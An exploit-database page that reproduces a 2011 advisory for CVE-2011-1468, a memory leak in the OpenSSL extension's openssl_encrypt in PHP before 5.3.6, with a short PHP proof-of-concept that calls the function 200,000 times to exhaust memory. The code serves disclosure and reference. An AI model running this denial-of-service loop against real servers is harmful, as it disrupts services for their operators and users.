Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service

Related Vulnerabilities: CVE-2011-1468  
Publish Date: 08 Mar 2011
Author: dovbysh
Source / Download Exploit 
                							

                source: http://www.securityfocus.com/bid/46977/info

PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.

Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.

Versions prior to PHP 5.3.6 are vulnerable. 

&lt;?php

$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f  frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";

$maxi = 200000;
$t = microtime(1);
for ($i=0;$i&lt;$maxi; $i++){
	openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";

?&gt;

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started